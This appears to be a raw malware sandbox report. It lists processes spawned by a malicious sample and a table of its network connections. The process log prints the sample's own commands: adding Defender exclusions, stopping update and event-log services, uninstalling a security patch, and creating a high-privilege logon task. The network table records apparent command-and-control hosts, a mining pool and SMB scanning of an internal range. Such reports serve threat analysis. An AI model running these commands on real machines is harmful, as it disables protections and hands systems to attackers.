"C:\Users\Admin\Pictures\UKHOJolg3CXlziMu5ibYYblw.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\Pictures\1LGsDPA6KSDaGGlfV7vAGcyw.exe
"C:\Users\Admin\Pictures\1LGsDPA6KSDaGGlfV7vAGcyw.exe"
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| US | 8.8.8.8:53 | midnight.bestsup.su | udp |
| US | 8.8.8.8:53 | namecloudvideo.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| US | 15.204.49.148:80 | 15.204.49.148 | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| US | 104.21.29.103:80 | midnight.bestsup.su | tcp |
| US | 104.21.65.148:443 | namecloudvideo.org | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | shipbank.org | udp |
| US | 172.67.146.202:443 | shipbank.org | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 8.8.8.8:53 | 234c6d18-3256-488e-b465-c4f656ececdc.uuid.createupdate.org | udp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| BA | 109.175.29.39:80 | sdfjhuz.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | server4.createupdate.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.sipgate.net | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 3.33.249.248:3478 | stun.sipgate.net | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| BA | 109.175.29.39:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | sajdfue.com | udp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| DO | 190.167.155.64:80 | sajdfue.com | tcp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| DO | 190.167.155.64:80 | sajdfue.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| DE | 49.13.89.149:443 | 49.13.89.149 | tcp |
| DE | 49.13.89.149:443 | 49.13.89.149 | tcp |
| DE | 49.13.89.149:443 | 49.13.89.149 | tcp |
| DE | 49.13.89.149:443 | 49.13.89.149 | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| HK | 141.98.234.31:53 | bwxobsm.com | udp |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| DE | 45.88.90.178:2023 | tcp | |
| US | 8.8.8.8:53 | server4.createupdate.org | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| N/A | 127.0.0.1:31465 | tcp | |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | valowaves.com | udp |
| US | 172.67.192.62:443 | valowaves.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | hadogarden.com | udp |
| VN | 103.216.113.30:443 | hadogarden.com | tcp |
| VN | 103.216.113.30:443 | hadogarden.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| DE | 45.88.90.178:2023 | tcp | |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | udp |
| US | 209.141.39.59:443 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| NL | 195.20.16.82:443 | tcp | |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| NL | 195.20.16.82:443 | tcp | |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | demo.nessotechbd.com | udp |
| US | 192.185.16.114:443 | demo.nessotechbd.com | tcp |
| US | 192.185.16.114:443 | demo.nessotechbd.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | unotree.ru | udp |
| US | 172.67.169.128:443 | unotree.ru | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| DE | 185.149.146.227:80 | tcp | |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| N/A | 127.0.0.1:31465 | tcp | |
| US | 8.8.8.8:53 | streamingplay.site | udp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| US | 8.8.8.8:53 | midnight.bestsup.su | udp |
| US | 8.8.8.8:53 | namecloudvideo.org | udp |
| US | 15.204.49.148:80 | 15.204.49.148 | tcp |
| US | 172.67.164.28:443 | namecloudvideo.org | tcp |
| US | 104.21.29.103:80 | midnight.bestsup.su | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | shipbank.org | udp |
| US | 104.21.10.217:443 | shipbank.org | tcp |
| US | 104.21.79.77:443 | yip.su | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| RU | 185.215.113.45:80 | 185.215.113.45 | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| US | 8.8.8.8:53 | download938.mediafire.com | udp |
| US | 205.196.121.133:443 | download938.mediafire.com | tcp |
| US | 205.196.121.133:443 | download938.mediafire.com | tcp |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | server4.createupdate.org | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | showlock.net | udp |
| NL | 190.2.153.200:40001 | showlock.net | tcp |
| US | 8.8.8.8:53 | server4.createupdate.org | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 8.8.8.8:53 | stun.ipfire.org | udp |
| DE | 81.3.27.44:3478 | stun.ipfire.org | udp |
| US | 8.8.8.8:53 | snickerfool.com | udp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 8.8.8.8:53 | trythisgid.com | udp |
| CZ | 46.8.8.100:443 | trythisgid.com | tcp |
| US | 8.8.8.8:53 | ww82.trythisgid.com | udp |
| US | 199.59.243.225:80 | ww82.trythisgid.com | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.255:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.32:445 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.1.46:445 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.1.12:445 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.3:445 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
